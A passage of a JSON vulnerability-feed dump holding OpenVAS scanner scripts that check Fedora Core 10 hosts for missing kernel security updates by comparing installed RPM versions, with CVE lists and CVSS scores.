value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-10525 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=527534\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528887\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=526788\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.37~170.2.104.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:16", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.", "cvss3": {}, "published": "2009-11-11T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-11038 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2008-5079", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66202", "href": "http://plugins.openvas.org/nasl.php?oid=66202", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_11038.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-11038 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-11038\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.\";\n\n\n\nif(description)\n{\n script_id(66202);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-11038 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530515\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529626\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529597\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528868\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:51", "description": "The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.", "cvss3": {}, "published": "2009-11-11T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-11038 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2008-5079", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066202", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066202", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_11038.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-11038 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-11038\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory FEDORA-2009-11038.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66202\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-11038 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=530515\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529626\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=529597\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=528868\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.38~170.2.113.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:01", "description": "The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.", "cvss3": {}, "published": "2009-12-14T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-13098 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4005", "CVE-2008-5079", "CVE-2009-3080", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-4031", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066509", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13098.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13098 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.41:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.39\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.40\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.41\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13098\";\ntag_summary = \"The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66509\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-4031\", \"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3080\", \"CVE-2009-4005\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-13098 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539414\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539435\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541160\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", 